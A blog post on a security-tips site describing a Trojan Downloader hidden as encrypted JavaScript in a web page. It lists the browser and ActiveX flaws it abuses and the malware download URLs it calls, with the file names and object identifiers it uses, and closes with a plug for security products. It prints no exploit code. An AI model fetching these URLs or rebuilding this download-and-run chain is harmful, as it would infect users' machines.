SELaplana >> Security >> Trojan-Downloader

Trojan Downloader is another variant of Trojan that downloads another program via the Internet and launches it on the victim machine without his knowledge or consent. Trojan Downloader is an encrypted Java Script within an HTML document. Trojan Downloader is 14147 bytes in size.

The Trojan Downloader activates when the infected page is opened using the web browser. You will know that the page is infected if the page shows the following message:

Not Found
The requested URL / was not found on this server.

The Trojan then decrypts its body and launches the malicious script for execution. The Trojan then uses the vulnerabilities listed below:

1. a buffer overflow in the Live Picture Corporation DXSurface.LivePicture.FlashPix.1 ActiveX control in DXTLIPI.DLL when processing “SourceUrl()” (CVE-2007-4336)
2. in the Windows Media Player plug-in, when processing an excessively long “src” parameter in the “embed” tag (MS06-006). The vulnerability is present when the plug-in is launched in browsers which are not Internet Explorer.
3. in the QuickTime.QuickTime” ActiveX object (CVE-2004-0431);

This is to download a file called “ldr.exe” from the URL shown below:

http://java62.com/load.php****

This file is 48640 bytes in size. It will be detected by Kaspersky Anti-Virus as Backdoor.Win32.Agent.ich. This file will be saved to the Windows system directory under the following name:

%System%~.exe

The file is then launched for execution. The Trojan then uses the “Msxml2.XMLHTTP” ActiveX object, and the objects which have the following unique identifiers in the system registry:

{BD96C556-65A3-11D0-983A-00C04FC29E30}
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6E32070A-766D-4EE6-879C-DC1FA91D2FC3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43C8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44F9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496B-B050-6C07C962476B}

This is to download a file called “ldr.exe” from the link shown below:

http://java62.com/load.php?MSIE

It uses the “ADODB.Stream” ActiveX object to save this file under the following name:

c:sys.exe

rnd – four random Latin letters Example:
syskmtz.exe
syskqoq.exe

The downloaded file will then be launched for execution.

To protect your computer from Trojan-Downloader, you need to install Shield Deluxe and Security Shield.

Automatically receive updates via email...
Enter your email address:

Tags: Downloader, PC Security Shield, Security, Trojan
Tweet This!

Pinay Scandal

Actually, this terms refer to the photos, videos or any stories that reveal shameful, sxeperience, and secrets of some individuals or celebrities.

Hyborate At Work

Is there something song with the AVI file of yours? You are trying to activate it bu then a message will pop saying "The

Trojan Horse at Your Email

Just to warn you not to download the attachment of an email with the subject, "U.S. Secretary of State Condoleezza Rice has kicked German Chancellor

Even Virus Demands Ransom

I thought only Kidnappers or Carnappers demand ransom. But with the news told by the Fox News, I realized that even computer viruses demands ransom

Free PSP Game Download Sites, Bad

Is there really a thing that is free? PSP Game players love free thing especially downloadable free PSP game. But if you really care of

LimeWire P2P Site, Closing

October 27, 2010 - I was using LimeWire before in getting songs and movies for free. But then after realizing that most of the free

Norton AntiVirus 2006

Do you need protection for your computer against computer viruses? I think, Norton Anti-virus 2006 is good for the purpose. Norton AntiVirus 2006 wards off a

Shareaza Dev Team Needs Shareaza Users Support

I am using Shareaza software in downloading my favorite torrent files since 2005. It might not be the best P2P sharing software but at least

Ako Tube Pinay Scandal

Few internet users came into this blog after searching for akotube.com. I know why these people are searching for the "Ako Tube". These people are

Important Suggestions That You Can Use to Download Videos From YouTube

Author: Amanda K Eaddy One of the most popular video websites that is operating on the internet these days is YouTube. This website was launched in

How to make SMART Bro wireless download faster?

Question: How to make Smart Bro wireless download faster? Answer: I already talked about Smart Bro in my article "Smart Bro, Wireless Internet". And based on its

The Hacker Is Who?

When I visited the website of the Ang Dating Daan that features their 2006 Pasalamat, it was stated that the writer interviewed Rovhick Balunsay. If you

Norton Internet Security 2006: Avail Now

It's now time to protect yourselves from hackers, viruses, and spyware, dangerous phishing email and annoying spam. The Norton Internet Security 2006 is already available

WWW.PRC.GOV.PH – Harmful Website

This afternoon, I noticed that Google considered the official website of the Professional Regulation Commission or PRC as a harmful website. Here's the screenshot of the

How To Download Movies For Free?

Visitor's Question Regarding Downloading Movies: I am a freak on movies. I always rent VCD from a rental store. One day, I visited a friend. We watch

Code Name Morro, Microsoft’s Free Anti-Virus

After launching the latest version of the Microsoft's own search engine called Bing, it was reported that Microsoft is now testing with its own employees

www.sss.gov.ph static information

sss gov.ph SSS Online Inquiry